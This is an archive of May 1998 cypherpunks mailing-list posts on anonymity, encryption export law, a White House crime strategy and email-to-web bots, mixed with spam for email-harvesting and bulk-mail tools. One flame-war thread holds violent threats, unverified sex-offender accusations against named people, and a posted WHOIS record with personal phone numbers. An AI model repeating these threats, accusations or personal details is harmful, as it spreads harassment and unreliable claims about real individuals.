e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 May 1998 06:11:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC)
In-Reply-To: <3555FA78.7795@pageplanet.com>
Message-ID: <199805131311.PAA05504@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


eridani@databasix.com (Belinda Bryan) wrote:

> And there we have it, folks.  The anonymous stalker who's spent the past
> year following Gary Burnore around Usenet found a post in
> triangle.general that mentioned him, added a propaganda-filled follow up
> to it, and posted it to 9 newsgroups--many of whom have repeatedly
> requested that this crap be kept out of said groups.

"Anonymous stalker"?  For merely posting a reply to a public post on
Usenet?  What state or country has a statute against that, and what makes
you think the poster falls under its jurisdiction if it does exist?  As for
whether a certain post is "propaganda", that is for the reader to decide,
especially when of the content is independently verifiable.  The
"propaganda" you refer to was apparently intended to refute the fallacious
assertion that since Gary Lee Burnore's entry in the North Carolina
official database of registered sex offenders had apparently been removed,
then the underlying crime for which he was convicted and required to
register somehow automagically never happened.  To make such an assertion
is to invite rebuttal.

The thread you're whining about involved Steve Crisp <crisp@pageplanet.com>
threatening an anonymous poster with "beating the living fuck out of you"
if his/her identity could be determined, a second anonymous poster
challenging the propriety of such a threat, and yet another DataBasix
groupie, William McClatchie <wmcclatc@primenet.com>, calling the second
anonymous poster a "remailer abuser" for daring to make such a challenge.
So rather than denouncing the threat itself, you choose to call the person
challenging it an "anonymous stalker"?  If you feel no need to "hide"
anything, please feel free to post your street address and home phone
number.  But I imagine that many people with small children would not want
their names, from which their street address can be derived by someone with
the resources available to you and Gary Burnore, to fall into the hands of
a convicted child molester with a history of abusive retaliation.

Being threatened with physical violence for making an unpopular post is
one of the best arguments available as to why anonymity is necessary when
people like Steve Crisp and convicted child molester Gary Lee Burnore are
running around loose making those threats.

> Oh and lookee what else:  it was mailed to cypherpunks@toad.com,
> presumably for archival on the cypherpunks mailing list, where it will
> be picked up by WWW search engines.  Since those folks don't seem to
> mind having their archives used in personal grudge matches, I'll just
> start cc'ing my responses there as well.  I'm sure, as champions of free
> speech, they can understand the necessity of making sure both sides of
> the story get equal time.
 
This, of course, comes from the same Belinda Bryan who impersonated a
lawyer for DataBasix to demand the disclosure of (fortunately non-existant)
user logs from the Huge Cajones remailer in a failed Scientology-esque
attempt to embarass its users.  And that attack, BTW, started because Gary
Burnore was pissed that an anonymous whistle blower used a remailer to tip
of his victim's mother to the molestation.  As is typical of his style,
Burnore denounced that legitimate use of anonymity as "harassment" and
"abuse".  

It was also Burnore who chose to make PUBLIC what had previously been a
private e-mail, thus inviting his critics to factually evaluate the claims.
One of them apparently did so and discovered Gary Burnore's name and mug
shot were published on an official PUBLIC website of registered sex
offenders maintained by the state of North Carolina where Burnore moved
after leaving San Francisco.  Perhaps he should have learned a lesson from
Gary Hart and not have taunted the wrong people to find evidence of his
wrongdoing.

Will the continual harangue against privacy and anonymity by Gary Lee
Burnore, Belinda Bryan, Billy McClatchie, and other staffers and sock
puppets of the DataBasix wrecking crew never end?

BTW, Belinda, cross-posting your whining drivel in the fashion you're
threatening negates your lame attempts to achieve deniability by using the
infamous X-No-Archive header that has become the trademark of DataBasix'
denizens.  IOW, you won't be able to retroactively claim that an
embarassing post from you was "forged" because it's not archived at an
unbiased, third party site.  Can you say "oops"?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vpuser@u041.oh.vp.com (ADMIN-Standard VP login)
Date: Wed, 13 May 1998 12:12:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Question reports on Y2K report
Message-ID: <m0yZgwV-0002SbC@u041.oh.vp.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan,


Unfortunately it does not have a URL it is a printed report ( Febuary
1998), & I was given a copy of it.  One paragraph in the report ( that
I have read so far) does reference http://www.garynorth.com 

==========
NOTE:
Have not had the time to look at the Home Page for the report, but
could possibly be at http://www.mcalvany.com
===========

However, the report it self discusses all areas that the Y2K bug could
affect. The Only location, that I have found so far, is at the
subscription office  ( subscription is to high for me )

MIA
P.O. Box 84904
Phoenix, AZ 85071


Brian

> 
> Want to give me a URL?
> 
> -Declan
> 
> 
> 


-- 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cons0005@algnet.algonquinc.on.ca
Date: Wed, 13 May 1998 14:06:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Email Bot
Message-ID: <199805132105.RAA10590@algnet.algonquinc.on.ca>
MIME-Version: 1.0
Content-Type: text/plain


I was wondering if anyone knows of such a creature that I could send 
email to with an URL, and I would get a reply of that HTML file?
example I email   bot@somewhere.com with the 
Subject:http://www.hotmail.com

and I will get an email of the HTML file at www.hotmail.com
This would be handy because I don't have a broswer (2 meg RAM (I 
know)) and also for anonymity, cookies etc I couldn't be traced.




When you send mail, do you use a postcard or an envelope?
Get PGP (tm)                        my pgpID@ 0xD0186E85 
http://wabakimi.carleton.ca/~nmarion/pgp.html    -yashy-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: XXX Mail Service <postmaster@xxxmail.net>
Date: Thu, 14 May 1998 01:10:43 -0700 (PDT)
To: adult3@xxxmail.net
Subject: Are you getting traffic for free?
Message-ID: <3.0.3.32.19980513172010.00a0b168@208.15.12.231>
MIME-Version: 1.0
Content-Type: text/plain



If you are not getting traffic for FREE, the check out Sex Button;

http://www.sexbutton.com

The #1 way to generate fresh traffic to your site at no cost to yourself
when you use EXIT mode.  Unlike other programs Sex Button does not send all
*your* traffic to sponsors and click thru programs, it goes back to you.

 - Fresh traffic
 - More uniques
 - No sponsors
 - No banners
 - Traffic increase for free
 - Three different modes

Thanks for your time.


----------------------------------


Looking for content?

Then check out the #1 content on the 'net;

http://www.scarlett.net/starter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 105263.2354@compuserve.com
Date: Wed, 13 May 1998 17:51:36 -0700 (PDT)
Subject: Complete Internet Marketing
Message-ID: <199805140051.RAA16848@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Complete Internet Marketing
The E-mail Resource Center
toll free.....800-942-7913....toll free
fax 732-367-2229

Targeted E-mail Marketing......
No matter what your target is, we can compile a great list for you of people or 
businesses that may have an interest in what you have to offer.
We can do all of the email for you and have the replies come directly to your email 
address or we can accept the replies for you here and forward the replies to you.  Our 
addresses are compiled fresh for you as per your order. These email addresses can 
even be pulled geographically for you as well.
Address Lists start at $50 per thousand and we can offer you a better price on higher 
quantities.  Our clients are getting great results, so can you.

Bulk Email Programs.....

MAIL PUSHER
Want Your Mail to get in? We Have "Mail Pusher" - 
100% Delivery..State of the art penetration software. A Stealth Type Program on 
Steroids. Fast too, with 12 ports 100,000 per hour, 20 ports 160,000 per hour. 
Functional Demo Available. Price only $295.00

RAPID FIRE MAIL SERVER
This is the next generation of mass mail software. This allows you to turn your own 
computer into a bona fide mail server using a dial-up account or a dedicated ISDN or 
T-1. This program has several unique features. It delivers the mail directly from your 
computer which is now the mail server to the recipients mail server and let's you watch 
each piece of mail get delivered to the recipients mail box. No more guessing and 
seeding It sends at about 50,000 to 80,000 per hour from a 28.8 modem. If that isn't 
enough the program send in color with simple point and click controls to set font 
colors, background colors and make fonts bold, italics as well as align left, right or 
center the message.
Demo Available..Price only $395.00

STEALTH MASS MAILER
Stealth Sending Software - Transmits at 250,000 to 350,000 from a 33 modem with a
modest Pentium with 20 connections. THE INDUSTRY WORKHORSE. We are an 
authorized dealer offering full support 7 days a week. For a limited time Email pro 
(non supported) is included with Stealth at no extra cost, along
with CDS Check by Fax Software for free, plus 9 million addresses.
Demo Available..Price only $295.00

HURRICANE
Extremely fast. This extractor goes to major search engines (you can pick from a list of 
10 of the most popular search engines) and conducts a search by keyword or 
keywords. It then spiders the web pages that come up as search results extracting the 
email addresses and saving them in a plain text format. You can define how deep the 
search is to be. You can filter out addresses such as those with webmaster or admin. 
You can use additional filters to have the software only include url's containing certain 
keywords. It can also eliminate certain url's with specified keywords. This makes for 
some very tight targeting. The cost of Hurricane is $295 but scroll down to see the 
package deal.

GEO SNAKE
This is a targeted list builder that could also be used to collect general addresses. You 
input a city and state and hit the start button, kick back and watch it collect. Quite fast. 
Easy to use. The cost of geo Snake is $295.

NEWS SLEUTH
This software extracts email addresses from newsgroup postings by keyword. It 
targets. Very fast and easy to use. This software has a number of useful options to help 
you get the exact results you want so reading the help file is recommended. The demo 
will allow you to see how fast and easy it is to use but will not allow you to save or use 
the addresses collected. Cost of News Sleuth is $295.

*Special Deal*
Hurricane, Geo Snake & News Sleuth - all for $595.00

CHERRY PICKER
With this super easy to use software you can target addresses based on search engine
 keywords. Examples would be shoe manufacturers, chemical adhesives, retail clothing 
stores, airlines, import/export just to use a few examples. Want to know what the 
potential yield would be go to a major search engine and enter in a keyword(s) and 
see how many hits come up. This multi-threaded software searches seven search 
engines simultaneously, visiting the web sites and extracting the email addresses, 
removing the duplicates and putting them in plain text files, one address to a line. A 
child could learn to use this software in 15 minutes or less. Super easy. It runs in the 
background allowing you to perform other tasks with your computer. The yield will 
vary according to the search keywords, your system, your Internet connectivity, net 
traffic, etc. but the range tends to run from 1000 to 2000 addresses per hour but 
remember these are highly targeted lists that others charge big money for. Cherry 
Picker costs $295.00

BULK MATE
This is the greatest list manager program we know of. Does everything and then some. 
Cost is $199.00 Check out the demo, you'll be glad you did.

We accept Visa/Mastercard/American Express and Check by Fax.
Please call our toll free number for more information on all of our services. You can 
instantly download demos of all of our software.

CALL NOW...800-942-7913  OR FAX US AT 732-367-2229
To be removed from our database, please call us toll free and state your email address 
(please speak slowly and clearly) so that we can be sure to get your address clearly 
and we will honor your request to be removed immediately. We are responsible 
Internet Marketers.
Thank you! 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 May 1998 14:55:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: International Crime Control Strategy
Message-ID: <199805132155.RAA03248@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



                            THE WHITE HOUSE

                    Office of the Press Secretary
________________________________________________________________________
For Immediate Release                                       May 12, 1998



                  INTERNATIONAL CRIME CONTROL STRATEGY


BACKGROUND

International crime is a serious and potent threat to the American
people at home and abroad.  Drug and firearms trafficking, terrorism,
money laundering, counterfeiting, illegal alien smuggling, trafficking
in women and children, advanced fee scams, credit card fraud, auto
theft, economic espionage, intellectual property theft, computer
hacking, and public corruption are all linked to international criminal
activity and all have a direct impact on the security and prosperity of
the American people.

Americans spend billions of dollars annually on cocaine and heroin, all
of which originates abroad; in 1997, there were 123 terrorist attacks
against U.S. targets worldwide, including 108 bombings and eight
kidnappings; each year, approximately one billion dollars worth of
stolen cars are smuggled out of this country; annually, U.S. companies
lose up to $23 billion from the illegal duplication and piracy of films,
compact discs, computer software, pharmaceutical and textile products,
while U.S. credit card companies suffer losses of hundreds of millions
of dollars from international fraud; and several hundred U.S. companies
and other organizations have already suffered computer attacks in 1998,
resulting in millions of dollars of losses and significant threats to
our safety and security.

PURPOSE

The International Crime Control Strategy (ICCS) addresses this
increasing threat by providing a framework for integrating all facets of
the federal government response to international crime.  This first-ever
strategy reflects the high priority accorded international crime by this
Administration and builds on such existing strategies as the National
Drug Control Strategy and the Presidential Directives on alien
smuggling, counter-terrorism and nuclear materials safety and security.

The ICCS is also an important initiative in terms of enhancing the
ability of U.S. law enforcement officials to cooperate effectively with
their overseas counterparts in investigating and prosecuting
international crime cases.  At the upcoming Birmingham Summit, G-8
leaders will discuss international crime as one of the most pressing
issues related to increasing globalization and rapid technological and
economic change.  President Clinton will highlight the new ICCS in
underscoring the U.S. commitment to close cooperation with all nations
who are mobilizing to confront this increasing threat.

OVERVIEW

The ICCS is a plan of action containing eight broad goals with thirty
implementing objectives.  The ICCS expresses President Clinton's resolve
to combat international crime aggressively and substantially reduce its
impact on the daily lives of the American people.

The Strategy's eight goals and related objectives are:

1.   Extend the First Line of Defense Beyond U.S. Borders by 
     (a) preventing acts of international crime planned abroad before 

     they occur, (b) using all available laws to prosecute select 
     criminal acts committed abroad, and (c) intensifying activities 
     of law enforcement, diplomatic and consular personnel abroad.

2.   Protect U.S. Borders by (a) enhancing our land border inspection,
     detection and monitoring capabilities, (b) improving the 
     effectiveness of maritime and air smuggling interdiction efforts, 
     (c) seeking new, stiffer criminal penalties for smuggling 
     activities, and (d) targeting enforcement and prosecutorial 
     resources more effectively against smuggling crimes and 
     organizations.

3.   Deny Safe Haven to International Criminals by (a) negotiating new
     international agreements to create a seamless web for the prompt
     location, arrest and extradition of international fugitives, 
     (b) implementing strengthened immigration laws that prevent 
     international criminals from entering the United States and 
     provide for their prompt expulsion when appropriate, and 
     (c) promoting increased cooperation with foreign law enforcement 
     authorities.

4.   Counter International Financial Crime by (a) combating money
     laundering and strengthening enforcement efforts to reduce inbound 
     and outbound movement of criminal proceeds, (b) seizing the assets 
     of international criminals, (c) enhancing bilateral and 
     multilateral cooperation against all financial crime, and 
     (d) targeting offshore centers of international fraud, 
     counterfeiting, electronic access device schemes and other 
     financial crimes.

5.   Prevent Criminal Exploitation of International Trade by (a)
     interdicting illegal technology exports, (b) preventing unfair and
     predatory trade practices in violation of U.S. criminal law, (c)
     protecting intellectual property rights, (d) countering industrial
     theft and economic espionage of U.S. trade secrets, and (e) 
     enforcing import restrictions on certain harmful substances, 
     dangerous organisms and protected species.

6.   Respond to Emerging International Crime Threats by (a) disrupting 
     new activities of international organized crime groups, 
     (b) enhancing intelligence efforts against criminal enterprises, 
     (c) reducing trafficking in human beings and crimes against 
     children, (d) increasing enforcement efforts against high tech 
     and computer-related crime, and (e) continuing to identify and 
     counter the vulnerabilities of critical infrastructures and new 
     technologies in high tech areas.

7.   Foster International Cooperation and the Rule of Law by 
     (a) establishing international standards, goals and objectives to 
     combat international crime and by actively encouraging compliance, 
     (b) improving bilateral cooperation with foreign governments and 
     law enforcement authorities, and (c) strengthening the rule of law 
     as the foundation for democratic government and free markets in 
     order to reduce societies' vulnerability to criminal exploitation.


8.   Optimize the Full Range of U.S. Efforts by (a) enhancing executive
     branch policy and operational coordination mechanisms to assess 
     the risks of criminal threats and to integrate strategies, goals 
     and objectives to combat those threats, (b) mobilizing and 
     incorporating the private sector into U.S. government efforts, and 
     (c) developing measures of effectiveness to assess progress over 
     time.

ICCS INITIATIVES

Highlighted below are ten Administration initiatives to further our 
efforts to fight international crime.

1.  International Crime Control Act of 1998:  Proposed legislation
containing significant new law enforcement tools for the fight against
international crime.

2.  Comprehensive Threat Assessment:  A comprehensive assessment of the
threat to the American people posed by international crime, to be 
completed within six months.

3.  International Conference on Upholding Integrity Among Justice and
Security Officials:  An international conference to address upholding
integrity among key justice and security officials worldwide, to be
organized by the Vice President within the next six months.

4.  High Tech Crime:  An action plan, building on the work of the G-8
justice and interior ministers and the creation of the U.S. National
Infrastructure Protection Center, to protect interconnected U.S.
communications and information systems from attack by international
criminals.

5.  Border Law Enforcement:  A program to enhance border law enforcement
through deployment of advanced detection technology and investment of 
new resources.

6.  Financial Crimes:  A commitment to employ aggressively new tools to
deny criminals access to U.S. financial institutions and to enhance
enforcement efforts against financial crimes.

7.  International Asset Forfeiture and Sharing:  A U.S. call for new
criminal asset forfeiture regimes worldwide and new asset forfeiture
sharing agreements with our international partners.

8.  OAS Treaty Against Illicit Trafficking in Firearms:  A program to 
work with our OAS partners to implement fully a hemispheric convention 
to combat the illicit manufacturing of and trafficking in firearms, 
ammunition and explosives.

9.  Economic Espionage and Theft of Industrial Property:  A commitment 
to use the Economic Espionage Act to increase U.S. investigations and
prosecutions of individuals and companies who attempt to steal U.S.
proprietary information.

10.  Strategic Communications Plan:  A plan to engage the private 
sector in assessing the impact of international crime on that sector 
and in determining its appropriate role in countering this threat.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 13 May 1998 15:10:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Senate Intel Committee on Crypto
Message-ID: <199805132210.SAA30435@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


>From Senate Intelligence Committee Report 105-185, on intelligence 
funding for FY1999, May 7, 1998:

Encryption

    The Committee remains concerned about efforts to 
inappropriately ease or remove export restrictions on hardware 
and software encryption products. Export controls on encryption 
and other products serve a clearly defined purpose--to protect 
our nation's security. Therefore, the Committee believes that 
the effects on U.S. national security must be the paramount 
concern when considering any proposed change to encryption 
export policy, and will seek referral of any legislation 
regarding encryption export policy under its jurisdiction 
established under Senate Resolution 400.

    Export restrictions on encryption products assist the 
Intelligence Community in its signals intelligence mission. By 
collecting and analyzing signals intelligence, U.S. 
intelligence agencies seek to understand the policies, 
intentions, and plans of foreign state and nonstate actors. 
Signals intelligence plays an important role in the formation 
of American foreign and defense policy. It is also a 
significant factor in U.S. efforts to protect its citizens and 
soldiers against terrorism, the proliferation of weapons of 
mass destruction, narcotics trafficking, international crime 
and other threats to our nation's security.

    While the Committee recognizes the commercial interest in 
easing or removing export restrictions, it believes the safety 
of our citizens and soldiers should be the predominant concern 
when considering U.S. policy towards the export of any product. 
The Committee supports the continued control of encryption 
products, and believes that a comprehensive strategy on 
encryption export policy can and must be developed that 
addresses national security concerns as well as the promotion 
of American commercial interests abroad. The Committee looks 
forward to working with senior Administration officials in 
developing such a strategy.

-----

Full report: 

   http://jya.com/sr105-185.txt  (94K)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mgraffam@mhv.net
Date: Wed, 13 May 1998 15:20:41 -0700 (PDT)
To: cons0005@algnet.algonquinc.on.ca
Subject: Re: Email Bot
In-Reply-To: <199805132105.RAA10590@algnet.algonquinc.on.ca>
Message-ID: <Pine.LNX.3.96.980513180338.14846A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 13 May 1998 cons0005@algnet.algonquinc.on.ca wrote:

> I was wondering if anyone knows of such a creature that I could send 
> email to with an URL, and I would get a reply of that HTML file?
> example I email   bot@somewhere.com with the 
> Subject:http://www.hotmail.com
> 
> and I will get an email of the HTML file at www.hotmail.com
> This would be handy because I don't have a broswer (2 meg RAM (I 
> know)) and also for anonymity, cookies etc I couldn't be traced.

Uhm.. this service used to exist.. I dont know what the email addy
was though :( 

Another solution is to find a school that has a publicly usable lynx
account. Lynx is a text-based browser for Unix, and is fully usable
from a telnet session. Lynx is a nice browser. I use it all the time
on my local machine in an xterm. Yeah, I could fire up netscape ..
but lynx is better. :)

Try telneting to:

sailor.lib.md.us       login: guest
trfn.clpgh.org         login: trfn 
bob.bob.bofh.org       login: supply your email address
public.sunsite.unc.edu login: lynx
lynx.cc.ukans.edu      login: lynx

Be nice to these machines. 

Michael J. Graffam (mgraffam@mhv.net)
http://www.mhv.net/~mgraffam -- Philosophy, Religion, Computers, Crypto, etc
"..the isle is full of noises, sounds and sweet airs that give delight and
hurt not. Sometimes a thousand twangling instruments will hum about mine
ears, and sometimes voices.." Caliban, Shakespeare's "The Tempest"

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBNVoavgKEiLNUxnAfAQEbDgQAlLpdQL5GgLROhRb03T9P+YNAmhgPHzdX
JIpKx5ZDMn4IfEatfX1VWfNRdVjxAjn0cf1A0bx7ybB0XBjwP6DYR97Vy916ZVzj
LhFzNa0PLDkCbQUZBdicduoPA4LPRiRXFS0+AgFalCcCVpxx/l7bNdi8yAwv+1xp
dOQ2zjAJLvo=
=8E9+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Wed, 13 May 1998 18:45:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199805140121.SAA02562@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


[cons0005@algnet.algonquinc.on.ca wrote:]

I was wondering if anyone knows of such a creature that I could send 
email to with an URL, and I would get a reply of that HTML file?
example I email   bot@somewhere.com with the 
Subject:http://www.hotmail.com

and I will get an email of the HTML file at www.hotmail.com
This would be handy because I don't have a broswer (2 meg RAM (I 
know)) and also for anonymity, cookies etc I couldn't be traced.

-----

Actually you can do that really very easily. If you are interested in 
such Bot's. I really recommend you get O'Reilly's book: Web Client 
Programming, with Perl. It discusses to a large degree what your wanting 
to do. It has full source code as well, so you can take that and just 
fiddle with a bit until it suits your needs. Provided you or someone you 
know can program in Perl. 

I think one method you could do is to just use a majordomo server and 
tinker with it to suit the reception needs. Or you could on your own 
box, or a friends box. Make an account to the name you want, set up a 
resident program, with nohup or a simple cron job. Or do some script, 
that would serve equally as well. That could handle the reception 
facilities well enough. Then just use the modified bot to handle the 
HTML queries and sending and there you go. 

Although sending things back to the HTTP server in question might... 
interesting. If that place GET and POST methods for CGI scripts and 
dynamic pages, that raises some questions. Particularly, if the bot 
sends you the HTML doc that it requested, you view the page, yadda yadda 
yadda. It depends on how you want to work it and do it, you have to ask 
yourself. Do I want to send my request (whatever that maybe)from my 
machine? The request would go through. But it would be through your 
machine, and that would invalidate your anonymity. So thats a Bad 
Thing(tm) and out of the question. Or in cases like yours, the user 
might not have a browser. So that leaves it to us sending our request 
back to our automated little daemon and it does it for us. It would 
require just a little bit of handling and work to do the GET and POST 
methods for the CGI program your interacting with, but that would be 
minimal I think. I could be wrong however. In effect your using the bot 
as a kind of proxy for HTTP requests. 

If your really, REALLY desperate I might be able to quickly just put 
something together for you and post it here for you(or if another 
cypherpunk thats into Perl wants to do it, or if anyone else has any 
ideas). But you should be able to modify the code to suit whatever you 
want it to do. I've been experimenting with something similar, only on a 
slightly different note. If your patient, you can just subscribe to a 
majordomo "admin-help" list. Where the details of running such a thing 
are discussed by people that do. I'm sure one quite possibly exists 
somewhere. Then log on to a Bot mailing list and after hanging out on 
both for a while, asking a few questions perhaps you should be able to 
put something together I expect.

Or as mgraffam@mhv.net suggests you could log into those machines and do 
it that way. Which gives me another idea, you could have the bot run 
lynx remotely and then pipe the output from that to the letter it would 
send you and visa versa. But that makes things more complicated as well 
too. I question the value of doing that as well, I think the overhead 
would be a bit much, as well as being a slight hassle. I think over all, 
the easiest thing to do would be to possibly follow mgraffam's 
suggestion and just do that. Those are my thoughts on things at least. I 
hope they help.

I think the security possibilities of such a bot could be useful and 
could make a interesting discussion perhaps. There was one thread 
earlier that was discussing one such robot. From a government location, 
that was keeping tabs on crypto related sources. Crawling from link to 
link, from behind a firewall etc, etc, etc. If theres any more news 
relating to that thread, thats been uncovered I'd be interested in 
hearing more on it. 



______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: whitelaw@ndirect.co.uk
Date: Wed, 13 May 1998 10:20:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Encryption trends and legal issues
Message-ID: <3559D6C3.DF4EBD3@ndirect.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


I am looking for information on the legal and export issues on
encryption around the world and the current use of different encryption
algorithms today.

If anyone can send me some information or point me to the appropriate
sites I would be most grateful.


Thanks,

Gavin.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Rosen" <mrosen@peganet.com>
Date: Wed, 13 May 1998 15:46:22 -0700 (PDT)
To: "Stephen Zander" <gibreel@pobox.com>
Subject: Re: Chaffing and winnowing
Message-ID: <01bd7ebe$f2941940$014ce9c7@markdsk.peganet.com>
MIME-Version: 1.0
Content-Type: text/plain


>    Mark> ...  g. Data authentication equipment that calculates a
>    Mark> Message Authentication Code (MAC) or similar result to
>    Mark> ensure no alteration of text has taken place, or to
>    Mark> authenticate users, but does not allow for encryption of
>    Mark> data, text or other media other than that needed for the
>    Mark> authentication;
>
>But wasn't that the gist of Rivest's paper: he's not encrypting the
>message, he's just obscuring it really, really well.
>
>All this needs someone with the cash & the time to push it to court...
>
    Actually, the first parts I quoted applied to chaffing and winnowing
too:

a. Designed or modified to use ``cryptography'' employing digital techniques
to ensure ``information security'';
b. Designed or modified to perform cryptanalytic functions;
c. Designed or modified to use ``cryptography'' employing analog techniques
to ensure ``information security'';

    Part a. basically prevents any sort of "encryption" technique, whether
that technique uses a normal encryption algorithm, a hash function, or
quantum cryptography -- anything that can be used for "information security"
    I think that the NSA knew about chaffing and winnowing, and they talked
with the people who wrote the EAR and helped them make the legislation cover
chaffing and winnowing.
    Please know that I, in no way, like the EAR; it just seems that
everyone's hopes that chaffing and winnowing gets around the export controls
are invalid. The EAR doesn't care *how* you do the encryption, it only cares
that some sort of "encryption" was performed.
    Are there any legal-types out there that can give a more definitive
answer?

- Mark Rosen
http://www.mach5.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs <StanSqncrs@aol.com>
Date: Wed, 13 May 1998 18:06:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is
Message-ID: <4b0c119a.355a436e@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 5/13/98 7:46:13 PM Central Daylight Time,
gburnore@netcom.com writes:

<< and he couldn't possibly know who you are.  >>

It is my humble opinion, that nobody's cover has been blown, he fucked up.  He
cross-posted the same exact piece of spam (as some would say) to both me
anonomosly, and to the list roughly at the same time.

Stan Rosenthal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 13 May 1998 12:43:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Abusive crossposting by anonymous remailer user (Was: Gary Lee Burnore is a Convicted Sex Offender in Raleigh, NC)
In-Reply-To: <199805101850.LAA00114@sirius.infonex.com>
Message-ID: <199805131942.VAA17993@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Steve Crisp <crisp@pageplanet.com wrote:

> > The thread you're whining about involved Steve Crisp <crisp@pageplanet.com>
> > threatening an anonymous poster with "beating the living fuck out of you"
> > if his/her identity could be determined...
>  
> And it still stands. Come out of hiding and see if you survive the
> night.
>  
> Steve Crisp

Does anyone question the need for the ability to post anonymously with
censorious bullies like him running loose?  Him and Belinda Bryan
<eridani@databasix.com> threatening to "make life a living hell" for anyone
who dares to criticize her anonymously, that is.

Someone posts something he didn't like and he threatened that person with
bodily harm.  I criticize him anonymously for making that threat, and now
he threatens me, too.  That sure makes PagePlanet sound like a company I'd
like to do business with:

   PagePlanet (PAGEPLANET-DOM)
   3252 Octavia Street
   Raleigh, NC 27606
   US

   Domain Name: PAGEPLANET.COM

   Administrative Contact:
      Crisp, Steve  (SC2795)  crisp@PAGEPLANET.COM
      919-852-5262 (FAX) 919-233-0816
   Technical Contact, Zone Contact:
      Sullivan, Mikey  (MS5652)  mikey@PAGEPLANET.COM
      919-852-5262 (FAX) 919-852-5261
   Billing Contact:
      Crisp, Valerie  (VC370)  valerie@PAGEPLANET.COM
      919-233-6602 (FAX) 919-852-5261

   Record last updated on 10-Feb-98.
   Record created on 25-Nov-96.
   Database last updated on 13-May-98 03:50:14 EDT.

   Domain servers in listed order:

   DNS.PAGEPLANET.COM		205.152.36.2
   DNS2.PAGEPLANET.COM		205.152.36.3
   DNS3.PAGEPLANET.COM		208.194.157.172






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Wed, 13 May 1998 23:27:57 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [On Topic]
In-Reply-To: <199805122218.SAA26006@josh1.weboneinc.com>
Message-ID: <355A6D62.29C4@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Josh Schoof wrote:
> 
> FROM: aj@gaymen.com
> SUBJECT: Gay Site
> 
>         I just wanted to let you know that GayTV And GayMen.Com have
>         webmaster referral programs that pay you  for every person
>         that signs-up for either site.

Dimitri? Is that you, Dimitri...?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: R2wjEAy94@msn.com
Date: Wed, 13 May 1998 22:28:17 -0700 (PDT)
Subject: Are you curious about WHERE your family roots originate?
Message-ID: <199805140527.OAA04410@ns.joy.or.jp>
MIME-Version: 1.0
Content-Type: text/plain


Discover Your Family History - Rated "Cool Site of the Week"

                Come visit our website at,
http://207.93.198.221/culture2.htm
(if the above link is busy please use...)
http://209.67.53.232/culture2.htm

        Do you know WHO your ancestors are and WHAT they did?
        Do you know WHEN your surname first appeared?
        Are you curious about WHERE your family roots originate?

Now you can fill in the missing pieces of this puzzle.  Join the satisfied multitudes who have discovered their complete Family Surname History.

All Nationalities. It's easy. Just key your last name into our online index, and in seconds we will tell you it's origin and much MORE.  See if we've researched your complete family name history during our 25 years of professional research.

Read a sample history, plus - FREE Coat of Arms keychain with your family's most ancient coat of arms & crest. All in full color. Your family name history parchment is 11 x 17", approximately 1700 words. It is beautifully ILLUMINATED by your most ancient Coat of Arms in full authentic Heraldic Colors.  Over 500 URLs on family and heraldic history.

Please come visit our website at,
http://207.93.198.221/culture2.htm
(if the above link is busy please use...)
http://209.67.53.232/culture2.htm

Hall of Names International Inc.
1-888-My-Roots  (1-888-697-6687)


